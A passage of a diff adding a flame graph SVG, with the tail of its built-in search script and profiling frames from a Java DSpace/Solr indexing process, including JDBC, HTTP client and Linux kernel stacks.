+		var maxwidth = 0;
+		for (var i = 0; i < el.length; i++) {
+			var e = el[i];
+			var func = g_to_func(e);
+			var rect = find_child(e, "rect");
+			if (func == null || rect == null)
+				continue;
+
+			// Save max width. Only works as we have a root frame
+			var w = parseFloat(rect.attributes.width.value);
+			if (w > maxwidth)
+				maxwidth = w;
+
+			if (func.match(re)) {
+				// highlight
+				var x = parseFloat(rect.attributes.x.value);
+				orig_save(rect, "fill");
+				rect.attributes.fill.value = "rgb(230,0,230)";
+
+				// remember matches
+				if (matches[x] == undefined) {
+					matches[x] = w;
+				} else {
+					if (w > matches[x]) {
+						// overwrite with parent
+						matches[x] = w;
+					}
+				}
+				searching = 1;
+			}
+		}
+		if (!searching)
+			return;
+
+		searchbtn.classList.add("show");
+		searchbtn.firstChild.nodeValue = "Reset Search";
+
+		// calculate percent matched, excluding vertical overlap
+		var count = 0;
+		var lastx = -1;
+		var lastw = 0;
+		var keys = Array();
+		for (k in matches) {
+			if (matches.hasOwnProperty(k))
+				keys.push(k);
+		}
+		// sort the matched frames by their x location
+		// ascending, then width descending
+		keys.sort(function(a, b){
+			return a - b;
+		});
+		// Step through frames saving only the biggest bottom-up frames
+		// thanks to the sort order. This relies on the tree property
+		// where children are always smaller than their parents.
+		var fudge = 0.0001;	// JavaScript floating point
+		for (var k in keys) {
+			var x = parseFloat(keys[k]);
+			var w = matches[keys[k]];
+			if (x >= lastx + lastw - fudge) {
+				count += w;
+				lastx = x;
+				lastw = w;
+			}
+		}
+		// display matched percent
+		matchedtxt.classList.remove("hide");
+		var pct = 100 * count / maxwidth;
+		if (pct != 100) pct = pct.toFixed(1)
+		matchedtxt.firstChild.nodeValue = "Matched: " + pct + "%";
+	}
+]]>
+</script>
+<rect x="0.0" y="0" width="1200.0" height="886.0" fill="url(#background)"  />
+<text id="title" x="600.00" y="24" >Flame Graph</text>
+<text id="details" x="10.00" y="869" > </text>
+<text id="unzoom" x="10.00" y="24" class="hide">Reset Zoom</text>
+<text id="search" x="1090.00" y="24" >Search</text>
+<text id="ignorecase" x="1174.00" y="24" >ic</text>
+<text id="matched" x="1090.00" y="869" > </text>
+<g id="frames">
+<g >
+<title>do_sys_poll (1 samples, 0.23%)</title><rect x="1101.5" y="245" width="2.7" height="15.0" fill="rgb(213,69,69)" rx="2" ry="2" />
+<text  x="1104.50" y="255.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (2 samples, 0.45%)</title><rect x="978.1" y="117" width="5.4" height="15.0" fill="rgb(84,231,84)" rx="2" ry="2" />
+<text  x="981.14" y="127.5" ></text>
+</g>
+<g >
+<title>call_stub (189 samples, 42.95%)</title><rect x="667.0" y="549" width="506.9" height="15.0" fill="rgb(213,69,69)" rx="2" ry="2" />
+<text  x="670.05" y="559.5" >call_stub</text>
+</g>
+<g >
+<title>org/dspace/app/util/DailyFileAppender:::subAppend (3 samples, 0.68%)</title><rect x="1152.5" y="437" width="8.0" height="15.0" fill="rgb(104,249,104)" rx="2" ry="2" />
+<text  x="1155.45" y="447.5" ></text>
+</g>
+<g >
+<title>__x64_sys_futex (48 samples, 10.91%)</title><rect x="353.3" y="741" width="128.7" height="15.0" fill="rgb(217,74,74)" rx="2" ry="2" />
+<text  x="356.27" y="751.5" >__x64_sys_futex</text>
+</g>
+<g >
+<title>nf_ct_get_tuple (1 samples, 0.23%)</title><rect x="578.5" y="565" width="2.7" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="581.55" y="575.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.23%)</title><rect x="830.6" y="373" width="2.7" height="15.0" fill="rgb(207,60,60)" rx="2" ry="2" />
+<text  x="833.64" y="383.5" ></text>
+</g>
+<g >
+<title>pthread_cond_timedwait@@GLIBC_2.3.2 (19 samples, 4.32%)</title><rect x="10.0" y="789" width="51.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="13.00" y="799.5" >pthre..</text>
+</g>
+<g >
+<title>sun/net/spi/DefaultProxySelector$3:::run (1 samples, 0.23%)</title><rect x="1123.0" y="309" width="2.6" height="15.0" fill="rgb(89,236,89)" rx="2" ry="2" />
+<text  x="1125.95" y="319.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractBeanFactory:::isTypeMatch (10 samples, 2.27%)</title><rect x="1015.7" y="389" width="26.8" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="1018.68" y="399.5" >o..</text>
+</g>
+<g >
+<title>dequeue_task_fair (1 samples, 0.23%)</title><rect x="490.0" y="613" width="2.7" height="15.0" fill="rgb(204,55,55)" rx="2" ry="2" />
+<text  x="493.05" y="623.5" ></text>
+</g>
+<g >
+<title>java/lang/reflect/Method:::invoke (189 samples, 42.95%)</title><rect x="667.0" y="677" width="506.9" height="15.0" fill="rgb(82,229,82)" rx="2" ry="2" />
+<text  x="670.05" y="687.5" >java/lang/reflect/Method:::invoke</text>
+</g>
+<g >
+<title>sun/nio/cs/UTF_8$Encoder:::encode (3 samples, 0.68%)</title><rect x="747.5" y="373" width="8.0" height="15.0" fill="rgb(64,213,64)" rx="2" ry="2" />
+<text  x="750.50" y="383.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (8 samples, 1.82%)</title><rect x="219.2" y="757" width="21.4" height="15.0" fill="rgb(248,119,119)" rx="2" ry="2" />
+<text  x="222.18" y="767.5" >d..</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::findByUnique (1 samples, 0.23%)</title><rect x="964.7" y="421" width="2.7" height="15.0" fill="rgb(66,215,66)" rx="2" ry="2" />
+<text  x="967.73" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (189 samples, 42.95%)</title><rect x="667.0" y="741" width="506.9" height="15.0" fill="rgb(222,82,82)" rx="2" ry="2" />
+<text  x="670.05" y="751.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>[libjvm.so] (19 samples, 4.32%)</title><rect x="141.4" y="773" width="51.0" height="15.0" fill="rgb(205,57,57)" rx="2" ry="2" />
+<text  x="144.41" y="783.5" >[libj..</text>
+</g>
+<g >
+<title>JVM_DoPrivileged (1 samples, 0.23%)</title><rect x="1123.0" y="373" width="2.6" height="15.0" fill="rgb(226,87,87)" rx="2" ry="2" />
+<text  x="1125.95" y="383.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (25 samples, 5.68%)</title><rect x="63.6" y="773" width="67.1" height="15.0" fill="rgb(250,122,122)" rx="2" ry="2" />
+<text  x="66.64" y="783.5" >entry_S..</text>
+</g>
+<g >
+<title>__wake_up_sync_key (2 samples, 0.45%)</title><rect x="610.7" y="357" width="5.4" height="15.0" fill="rgb(254,129,129)" rx="2" ry="2" />
+<text  x="613.73" y="367.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (1 samples, 0.23%)</title><rect x="956.7" y="341" width="2.7" height="15.0" fill="rgb(77,225,77)" rx="2" ry="2" />
+<text  x="959.68" y="351.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.23%)</title><rect x="192.4" y="757" width="2.6" height="15.0" fill="rgb(251,124,124)" rx="2" ry="2" />
+<text  x="195.36" y="767.5" ></text>
+</g>
+<g >
+<title>tcp_ack (1 samples, 0.23%)</title><rect x="1128.3" y="53" width="2.7" height="15.0" fill="rgb(252,126,126)" rx="2" ry="2" />
+<text  x="1131.32" y="63.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern:::atom (1 samples, 0.23%)</title><rect x="986.2" y="261" width="2.7" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="989.18" y="271.5" ></text>
+</g>
+<g >
+<title>tcp_ack (3 samples, 0.68%)</title><rect x="616.1" y="373" width="8.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="619.09" y="383.5" ></text>
+</g>
+<g >
+<title>java/lang/StringBuilder:::append (1 samples, 0.23%)</title><rect x="704.6" y="341" width="2.7" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="707.59" y="351.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="905.7" y="341" width="2.7" height="15.0" fill="rgb(201,52,52)" rx="2" ry="2" />
+<text  x="908.73" y="351.5" ></text>
+</g>
+<g >
+<title>__x64_sys_futex (4 samples, 0.91%)</title><rect x="130.7" y="741" width="10.7" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="133.68" y="751.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::hasNext (1 samples, 0.23%)</title><rect x="1061.3" y="437" width="2.7" height="15.0" fill="rgb(53,203,53)" rx="2" ry="2" />
+<text  x="1064.27" y="447.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (48 samples, 10.91%)</title><rect x="353.3" y="629" width="128.7" height="15.0" fill="rgb(248,121,121)" rx="2" ry="2" />
+<text  x="356.27" y="639.5" >__intel_pmu_enab..</text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/RequestWriter$LazyContentStream:::getStream (3 samples, 0.68%)</title><rect x="747.5" y="405" width="8.0" height="15.0" fill="rgb(53,203,53)" rx="2" ry="2" />
+<text  x="750.50" y="415.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (16 samples, 3.64%)</title><rect x="15.4" y="645" width="42.9" height="15.0" fill="rgb(252,126,126)" rx="2" ry="2" />
+<text  x="18.36" y="655.5" >__pe..</text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendSync (1 samples, 0.23%)</title><rect x="1055.9" y="325" width="2.7" height="15.0" fill="rgb(107,252,107)" rx="2" ry="2" />
+<text  x="1058.91" y="335.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="216.5" y="693" width="2.7" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="219.50" y="703.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (4 samples, 0.91%)</title><rect x="299.6" y="757" width="10.8" height="15.0" fill="rgb(203,55,55)" rx="2" ry="2" />
+<text  x="302.64" y="767.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="170.9" y="469" width="5.4" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="173.91" y="479.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractBeanFactory:::doGetBean (8 samples, 1.82%)</title><rect x="972.8" y="405" width="21.4" height="15.0" fill="rgb(67,216,67)" rx="2" ry="2" />
+<text  x="975.77" y="415.5" >o..</text>
+</g>
+<g >
+<title>__x64_sys_futex (4 samples, 0.91%)</title><rect x="299.6" y="741" width="10.8" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="302.64" y="751.5" ></text>
+</g>
+<g >
+<title>update_blocked_averages (1 samples, 0.23%)</title><rect x="128.0" y="597" width="2.7" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="131.00" y="607.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (11 samples, 2.50%)</title><rect x="1120.3" y="405" width="29.5" height="15.0" fill="rgb(56,206,56)" rx="2" ry="2" />
+<text  x="1123.27" y="415.5" >or..</text>
+</g>
+<g >
+<title>nft_do_chain (1 samples, 0.23%)</title><rect x="583.9" y="565" width="2.7" height="15.0" fill="rgb(205,58,58)" rx="2" ry="2" />
+<text  x="586.91" y="575.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (1 samples, 0.23%)</title><rect x="1055.9" y="341" width="2.7" height="15.0" fill="rgb(109,254,109)" rx="2" ry="2" />
+<text  x="1058.91" y="351.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/support/ResourceEditorRegistrar:::registerCustomEditors (1 samples, 0.23%)</title><rect x="975.5" y="357" width="2.6" height="15.0" fill="rgb(53,203,53)" rx="2" ry="2" />
+<text  x="978.45" y="367.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (2 samples, 0.45%)</title><rect x="1098.8" y="357" width="5.4" height="15.0" fill="rgb(79,226,79)" rx="2" ry="2" />
+<text  x="1101.82" y="367.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::split (1 samples, 0.23%)</title><rect x="801.1" y="437" width="2.7" height="15.0" fill="rgb(71,219,71)" rx="2" ry="2" />
+<text  x="804.14" y="447.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.23%)</title><rect x="1069.3" y="325" width="2.7" height="15.0" fill="rgb(102,248,102)" rx="2" ry="2" />
+<text  x="1072.32" y="335.5" ></text>
+</g>
+<g >
+<title>com/atmire/dspace/discovery/AtmireSolrService:::buildDocument (155 samples, 35.23%)</title><rect x="667.0" y="469" width="415.7" height="15.0" fill="rgb(107,252,107)" rx="2" ry="2" />
+<text  x="670.05" y="479.5" >com/atmire/dspace/discovery/AtmireSolrService:::buildDoc..</text>
+</g>
+<g >
+<title>try_to_wake_up (2 samples, 0.45%)</title><rect x="610.7" y="309" width="5.4" height="15.0" fill="rgb(216,74,74)" rx="2" ry="2" />
+<text  x="613.73" y="319.5" ></text>
+</g>
+<g >
+<title>psi_task_change (1 samples, 0.23%)</title><rect x="58.3" y="661" width="2.7" height="15.0" fill="rgb(243,113,113)" rx="2" ry="2" />
+<text  x="61.27" y="671.5" ></text>
+</g>
+<g >
+<title>com/atmire/dspace/discovery/AtmireSolrService:::indexContent (181 samples, 41.14%)</title><rect x="667.0" y="485" width="485.5" height="15.0" fill="rgb(90,237,90)" rx="2" ry="2" />
+<text  x="670.05" y="495.5" >com/atmire/dspace/discovery/AtmireSolrService:::indexContent</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="1090.8" y="341" width="2.7" height="15.0" fill="rgb(251,124,124)" rx="2" ry="2" />
+<text  x="1093.77" y="351.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (1 samples, 0.23%)</title><rect x="1165.9" y="453" width="2.6" height="15.0" fill="rgb(63,212,63)" rx="2" ry="2" />
+<text  x="1168.86" y="463.5" ></text>
+</g>
+<g >
+<title>JVM_GetStackTraceElement (1 samples, 0.23%)</title><rect x="683.1" y="277" width="2.7" height="15.0" fill="rgb(208,62,62)" rx="2" ry="2" />
+<text  x="686.14" y="287.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (18 samples, 4.09%)</title><rect x="144.1" y="709" width="48.3" height="15.0" fill="rgb(213,69,69)" rx="2" ry="2" />
+<text  x="147.09" y="719.5" >[lib..</text>
+</g>
+<g >
+<title>Finalizer (10 samples, 2.27%)</title><rect x="192.4" y="821" width="26.8" height="15.0" fill="rgb(238,105,105)" rx="2" ry="2" />
+<text  x="195.36" y="831.5" >F..</text>
+</g>
+<g >
+<title>inet6_recvmsg (21 samples, 4.77%)</title><rect x="484.7" y="725" width="56.3" height="15.0" fill="rgb(200,50,50)" rx="2" ry="2" />
+<text  x="487.68" y="735.5" >inet6..</text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.23%)</title><rect x="948.6" y="277" width="2.7" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="951.64" y="287.5" ></text>
+</g>
+<g >
+<title>__memset_avx2_erms (1 samples, 0.23%)</title><rect x="189.7" y="661" width="2.7" height="15.0" fill="rgb(225,86,86)" rx="2" ry="2" />
+<text  x="192.68" y="671.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Item:::getCollections (4 samples, 0.91%)</title><rect x="943.3" y="453" width="10.7" height="15.0" fill="rgb(91,237,91)" rx="2" ry="2" />
+<text  x="946.27" y="463.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.23%)</title><rect x="1128.3" y="293" width="2.7" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="1131.32" y="303.5" ></text>
+</g>
+<g >
+<title>java/security/AccessController:::doPrivileged (5 samples, 1.14%)</title><rect x="836.0" y="357" width="13.4" height="15.0" fill="rgb(94,240,94)" rx="2" ry="2" />
+<text  x="839.00" y="367.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.23%)</title><rect x="61.0" y="645" width="2.6" height="15.0" fill="rgb(202,53,53)" rx="2" ry="2" />
+<text  x="63.95" y="655.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%)</title><rect x="798.5" y="373" width="2.6" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="801.45" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/request/RequestWriter$LazyContentStream:::getDelegate (19 samples, 4.32%)</title><rect x="696.5" y="389" width="51.0" height="15.0" fill="rgb(105,250,105)" rx="2" ry="2" />
+<text  x="699.55" y="399.5" >org/a..</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::setColumn (4 samples, 0.91%)</title><rect x="921.8" y="405" width="10.7" height="15.0" fill="rgb(107,252,107)" rx="2" ry="2" />
+<text  x="924.82" y="415.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (13 samples, 2.95%)</title><rect x="310.4" y="773" width="34.8" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="313.36" y="783.5" >en..</text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.23%)</title><rect x="755.5" y="357" width="2.7" height="15.0" fill="rgb(200,51,51)" rx="2" ry="2" />
+<text  x="758.55" y="367.5" ></text>
+</g>
+<g >
+<title>enqueue_entity (1 samples, 0.23%)</title><rect x="610.7" y="277" width="2.7" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="613.73" y="287.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="61.0" y="709" width="2.6" height="15.0" fill="rgb(206,60,60)" rx="2" ry="2" />
+<text  x="63.95" y="719.5" ></text>
+</g>
+<g >
+<title>futex_wait_queue_me (19 samples, 4.32%)</title><rect x="10.0" y="709" width="51.0" height="15.0" fill="rgb(220,79,79)" rx="2" ry="2" />
+<text  x="13.00" y="719.5" >futex..</text>
+</g>
+<g >
+<title>Interpreter (189 samples, 42.95%)</title><rect x="667.0" y="693" width="506.9" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="670.05" y="703.5" >Interpreter</text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.23%)</title><rect x="785.0" y="277" width="2.7" height="15.0" fill="rgb(209,64,64)" rx="2" ry="2" />
+<text  x="788.05" y="287.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (1 samples, 0.23%)</title><rect x="964.7" y="405" width="2.7" height="15.0" fill="rgb(86,233,86)" rx="2" ry="2" />
+<text  x="967.73" y="415.5" ></text>
+</g>
+<g >
+<title>bbr_cwnd_event (1 samples, 0.23%)</title><rect x="645.6" y="629" width="2.7" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="648.59" y="639.5" ></text>
+</g>
+<g >
+<title>[unknown] (9 samples, 2.05%)</title><rect x="192.4" y="805" width="24.1" height="15.0" fill="rgb(235,102,102)" rx="2" ry="2" />
+<text  x="195.36" y="815.5" >[..</text>
+</g>
+<g >
+<title>org/dspace/content/Bundle:::getBitstreamsInternal (2 samples, 0.45%)</title><rect x="932.5" y="421" width="5.4" height="15.0" fill="rgb(73,221,73)" rx="2" ry="2" />
+<text  x="935.55" y="431.5" ></text>
+</g>
+<g >
+<title>java/net/SocketTimeoutException:::&lt;init&gt; (1 samples, 0.23%)</title><rect x="1144.4" y="213" width="2.7" height="15.0" fill="rgb(81,228,81)" rx="2" ry="2" />
+<text  x="1147.41" y="223.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::getSSLSession (1 samples, 0.23%)</title><rect x="1136.4" y="373" width="2.6" height="15.0" fill="rgb(79,227,79)" rx="2" ry="2" />
+<text  x="1139.36" y="383.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="216.5" y="725" width="2.7" height="15.0" fill="rgb(203,55,55)" rx="2" ry="2" />
+<text  x="219.50" y="735.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (2 samples, 0.45%)</title><rect x="1093.5" y="373" width="5.3" height="15.0" fill="rgb(55,205,55)" rx="2" ry="2" />
+<text  x="1096.45" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/DefaultConnectionReuseStrategy:::keepAlive (1 samples, 0.23%)</title><rect x="1114.9" y="405" width="2.7" height="15.0" fill="rgb(68,216,68)" rx="2" ry="2" />
+<text  x="1117.91" y="415.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::setColumn (1 samples, 0.23%)</title><rect x="962.0" y="421" width="2.7" height="15.0" fill="rgb(80,228,80)" rx="2" ry="2" />
+<text  x="965.05" y="431.5" ></text>
+</g>
+<g >
+<title>JVM_DoPrivileged (5 samples, 1.14%)</title><rect x="860.1" y="325" width="13.4" height="15.0" fill="rgb(220,80,80)" rx="2" ry="2" />
+<text  x="863.14" y="335.5" ></text>
+</g>
+<g >
+<title>schedule (18 samples, 4.09%)</title><rect x="12.7" y="693" width="48.3" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="15.68" y="703.5" >sche..</text>
+</g>
+<g >
+<title>nft_do_chain_inet (4 samples, 0.91%)</title><rect x="632.2" y="437" width="10.7" height="15.0" fill="rgb(219,78,78)" rx="2" ry="2" />
+<text  x="635.18" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="170.9" y="405" width="5.4" height="15.0" fill="rgb(214,70,70)" rx="2" ry="2" />
+<text  x="173.91" y="415.5" ></text>
+</g>
+<g >
+<title>vtable stub (1 samples, 0.23%)</title><rect x="1053.2" y="421" width="2.7" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="1056.23" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="683.1" y="245" width="2.7" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="686.14" y="255.5" ></text>
+</g>
+<g >
+<title>java/security/AccessController:::doPrivileged (5 samples, 1.14%)</title><rect x="860.1" y="341" width="13.4" height="15.0" fill="rgb(105,250,105)" rx="2" ry="2" />
+<text  x="863.14" y="351.5" ></text>
+</g>
+<g >
+<title>org/apache/http/client/protocol/RequestAddCookies:::process (1 samples, 0.23%)</title><rect x="793.1" y="357" width="2.7" height="15.0" fill="rgb(57,206,57)" rx="2" ry="2" />
+<text  x="796.09" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.23%)</title><rect x="964.7" y="373" width="2.7" height="15.0" fill="rgb(64,213,64)" rx="2" ry="2" />
+<text  x="967.73" y="383.5" ></text>
+</g>
+<g >
+<title>Java_java_lang_Throwable_fillInStackTrace (1 samples, 0.23%)</title><rect x="1144.4" y="181" width="2.7" height="15.0" fill="rgb(210,64,64)" rx="2" ry="2" />
+<text  x="1147.41" y="191.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (2 samples, 0.45%)</title><rect x="1168.5" y="389" width="5.4" height="15.0" fill="rgb(73,221,73)" rx="2" ry="2" />
+<text  x="1171.55" y="399.5" ></text>
+</g>
+<g >
+<title>Interpreter (189 samples, 42.95%)</title><rect x="667.0" y="533" width="506.9" height="15.0" fill="rgb(244,115,115)" rx="2" ry="2" />
+<text  x="670.05" y="543.5" >Interpreter</text>
+</g>
+<g >
+<title>tick_sched_timer (1 samples, 0.23%)</title><rect x="755.5" y="309" width="2.7" height="15.0" fill="rgb(226,88,88)" rx="2" ry="2" />
+<text  x="758.55" y="319.5" ></text>
+</g>
+<g >
+<title>jlong_disjoint_arraycopy (1 samples, 0.23%)</title><rect x="696.5" y="373" width="2.7" height="15.0" fill="rgb(247,119,119)" rx="2" ry="2" />
+<text  x="699.55" y="383.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (18 samples, 4.09%)</title><rect x="246.0" y="757" width="48.3" height="15.0" fill="rgb(221,80,80)" rx="2" ry="2" />
+<text  x="249.00" y="767.5" >do_s..</text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.45%)</title><rect x="170.9" y="501" width="5.4" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="173.91" y="511.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (2 samples, 0.45%)</title><rect x="782.4" y="357" width="5.3" height="15.0" fill="rgb(99,245,99)" rx="2" ry="2" />
+<text  x="785.36" y="367.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.23%)</title><rect x="798.5" y="293" width="2.6" height="15.0" fill="rgb(85,232,85)" rx="2" ry="2" />
+<text  x="801.45" y="303.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (3 samples, 0.68%)</title><rect x="1066.6" y="373" width="8.1" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="1069.64" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (4 samples, 0.91%)</title><rect x="769.0" y="373" width="10.7" height="15.0" fill="rgb(58,208,58)" rx="2" ry="2" />
+<text  x="771.95" y="383.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="61.0" y="773" width="2.6" height="15.0" fill="rgb(222,82,82)" rx="2" ry="2" />
+<text  x="63.95" y="783.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.23%)</title><rect x="173.6" y="357" width="2.7" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="176.59" y="367.5" ></text>
+</g>
+<g >
+<title>__x64_sys_recvfrom (21 samples, 4.77%)</title><rect x="484.7" y="757" width="56.3" height="15.0" fill="rgb(250,123,123)" rx="2" ry="2" />
+<text  x="487.68" y="767.5" >__x64..</text>
+</g>
+<g >
+<title>org/apache/solr/common/SolrDocument:::setField (1 samples, 0.23%)</title><rect x="1106.9" y="293" width="2.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1109.86" y="303.5" ></text>
+</g>
+<g >
+<title>ip_output (22 samples, 5.00%)</title><rect x="586.6" y="613" width="59.0" height="15.0" fill="rgb(210,65,65)" rx="2" ry="2" />
+<text  x="589.59" y="623.5" >ip_out..</text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (13 samples, 2.95%)</title><rect x="1114.9" y="421" width="34.9" height="15.0" fill="rgb(69,217,69)" rx="2" ry="2" />
+<text  x="1117.91" y="431.5" >or..</text>
+</g>
+<g >
+<title>java/lang/ThreadLocal:::getMap (1 samples, 0.23%)</title><rect x="972.8" y="389" width="2.7" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="975.77" y="399.5" ></text>
+</g>
+<g >
+<title>futex_wait_queue_me (25 samples, 5.68%)</title><rect x="63.6" y="709" width="67.1" height="15.0" fill="rgb(215,72,72)" rx="2" ry="2" />
+<text  x="66.64" y="719.5" >futex_w..</text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (2 samples, 0.45%)</title><rect x="948.6" y="341" width="5.4" height="15.0" fill="rgb(83,231,83)" rx="2" ry="2" />
+<text  x="951.64" y="351.5" ></text>
+</g>
+<g >
+<title>__netif_receive_skb_one_core (16 samples, 3.64%)</title><rect x="600.0" y="485" width="42.9" height="15.0" fill="rgb(213,69,69)" rx="2" ry="2" />
+<text  x="603.00" y="495.5" >__ne..</text>
+</g>
+<g >
+<title>org/dspace/content/Community:::getParentCommunity (3 samples, 0.68%)</title><rect x="908.4" y="437" width="8.1" height="15.0" fill="rgb(84,231,84)" rx="2" ry="2" />
+<text  x="911.41" y="447.5" ></text>
+</g>
+<g >
+<title>org/dspace/text/filter/LowerCaseAndTrim:::filter (1 samples, 0.23%)</title><rect x="903.0" y="421" width="2.7" height="15.0" fill="rgb(57,207,57)" rx="2" ry="2" />
+<text  x="906.05" y="431.5" ></text>
+</g>
+<g >
+<title>nft_meta_get_eval (1 samples, 0.23%)</title><rect x="583.9" y="549" width="2.7" height="15.0" fill="rgb(214,71,71)" rx="2" ry="2" />
+<text  x="586.91" y="559.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::find (1 samples, 0.23%)</title><rect x="943.3" y="405" width="2.7" height="15.0" fill="rgb(84,231,84)" rx="2" ry="2" />
+<text  x="946.27" y="415.5" ></text>
+</g>
+<g >
+<title>__pthread_getspecific (1 samples, 0.23%)</title><rect x="173.6" y="165" width="2.7" height="15.0" fill="rgb(254,128,128)" rx="2" ry="2" />
+<text  x="176.59" y="175.5" ></text>
+</g>
+<g >
+<title>__x64_sys_futex (17 samples, 3.86%)</title><rect x="246.0" y="741" width="45.6" height="15.0" fill="rgb(208,62,62)" rx="2" ry="2" />
+<text  x="249.00" y="751.5" >__x6..</text>
+</g>
+<g >
